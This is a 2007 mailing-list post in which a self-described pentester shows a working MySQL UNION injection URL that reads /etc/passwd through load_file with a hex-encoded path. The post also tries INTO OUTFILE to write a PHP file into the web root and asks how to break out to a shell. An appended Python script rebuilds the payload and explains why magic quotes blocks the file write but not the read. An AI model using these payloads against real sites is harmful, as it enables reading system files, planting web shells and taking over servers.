Breaking from MySQL to Linux system (SQL Injection).

From: Danett song (danett18@yahoo.com.br)
Date: Sat Jul 21 2007 - 21:28:12 EDT


Hello

I'm pentesting a customer using a black-box method, and I
found a MySQL injection based on error responses.

I'm able to exploit it using a query like this one:

http://site/files/index.php?url=search.php&id=251%20UNION%20SELECT%20load_file(0x2F6574632F706173737764),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*&coditem=251

It worked OK, so I could extract the contents of the
passwd file.

The server has magic quotes on, so I needed to hex-encode
the filenames. The PHP files connect as the user mysql.

I made some tests without success:

a) Via another flaw I could disclose the DocumentRoot,
which is /web/site. If I try to read the index.php file
using the same injection, but only replacing /etc/passwd
with /web/site/files/index.php (obviously hex-encoding
it), I get no reply! It doesn't return any content of
index.php! It also works for /etc/hosts. Why isn't it
working? Strange, huh? The default umask allows all users
to read newly created files, and I think it is very
uncommon for a developer to remove the read permissions
from all the .php files he uploads. Do you mean that is
the case? Or am I missing something?

b) My goal is to gain access to the Linux system; the
server has only port 80 open. My best try was to create a
.php file inside the DocumentRoot and access it via the
browser, but this file never got created. I'm not sure
whether it's because it doesn't have permissions, or
problems related to quotes!

I tried using the method in question a), but replacing
the union with:

SELECT '<?php phpinfo(); ?>' INTO OUTFILE
'/http/arquivos/phpinfo.php'

I tried hex-encoding both the PHP code and the filename. I
also tried replacing the quote (') in the name with (%).
But nothing worked.

The OWASP testing guide says that if my server has
magic_quotes on, which is my case, it's not possible.

http://www.owasp.org/index.php/Testing_for_MySQL

However, NGSSoftware disagrees:

http://www.ngssoftware.com/papers/HackproofingMySQL.pdf

I also tried using char() encoding and the GBK 0xbf27
trick (I had never tried it before, but it appears not to
work in this case).

Any idea how to complete this attack?

c) Because I'm using a bunch of NULLs to make the UNION
statement valid, I can't do (at least I don't know how to
do) a complex select, which requires the use of commas
(,), or else it will break my UNION statement. How do I
deal with it when my injected query has MORE commas than
the commas used in the NULLs to make the select valid?

d) Any idea how to break out from MySQL to the Linux
system?

Cheers

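The following is an added example, not part of the original post or its replies. It recasts the payload construction the post describes in Python so the two behaviours in questions a) and b) can be compared offline: `addslashes()` emulates what PHP's magic_quotes_gpc does to a request parameter (backslash-escaping ' " \ and NUL), `hex_literal()` produces the MySQL 0x... string literal the post uses for /etc/passwd, and `union_load_file()` builds the `UNION SELECT load_file(...),NULL,...` tail with the column count padded by NULLs. The injection point is a numeric `id` parameter, so no quote is needed to break out of the original query, and a hex literal carries the path without any quote character; `INTO OUTFILE`, by contrast, requires its file name as a quoted string literal (MySQL does not accept a hex literal there), so the quote is exactly what magic quotes escapes. The function names and the sample paths are this example's own choices.

```python
import binascii


def addslashes(s: str) -> str:
    """Emulate PHP's magic_quotes_gpc / addslashes(): backslash-escape ' " \\ and NUL.

    This is a model of the PHP behaviour, written for this example.
    """
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def hex_literal(s: str) -> str:
    """MySQL hexadecimal string literal, e.g. 0x2F6574632F706173737764 for /etc/passwd.

    A hex literal contains no quote characters, so magic quotes leaves it alone.
    """
    return "0x" + binascii.hexlify(s.encode()).decode().upper()


def union_load_file(path: str, columns: int) -> str:
    """Build the UNION SELECT tail from the post: the first column carries load_file()
    on a hex-encoded path, the remaining columns are NULL so the column count matches
    the original SELECT, and /* comments out whatever follows the injection point."""
    if columns < 1:
        raise ValueError("need at least one column")
    cols = [f"load_file({hex_literal(path)})"] + ["NULL"] * (columns - 1)
    return "UNION SELECT " + ",".join(cols) + "/*"


def into_outfile(path: str, payload: str) -> str:
    """INTO OUTFILE variant: the payload can be hex-encoded, but MySQL requires the
    file name to be a quoted string literal, so a quote character is unavoidable."""
    return f"SELECT {hex_literal(payload)} INTO OUTFILE '{path}'"


def survives_magic_quotes(payload: str) -> bool:
    """True when addslashes() leaves the payload unchanged, i.e. there is nothing in
    it for magic_quotes_gpc to escape."""
    return addslashes(payload) == payload


def compare(columns: int = 10) -> dict:
    """Run both payloads through the magic-quotes model and report which survive.

    Paths below are constructed sample values for this example."""
    read = union_load_file("/etc/passwd", columns)
    write = into_outfile("/web/site/files/phpinfo.php", "<?php phpinfo(); ?>")
    return {
        "load_file_payload": read,
        "load_file_survives": survives_magic_quotes(read),
        "outfile_payload": write,
        "outfile_after_magic_quotes": addslashes(write),
        "outfile_survives": survives_magic_quotes(write),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

Running the script shows the load_file() payload passing through unchanged (it is the same tail as in the URL quoted above, with nine NULLs for a ten-column SELECT), while the INTO OUTFILE statement comes out with `\'` around the file name, which MySQL rejects as a syntax error. That asymmetry is the reason reading files works under magic quotes while writing them with INTO OUTFILE does not, independent of file-system permissions.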



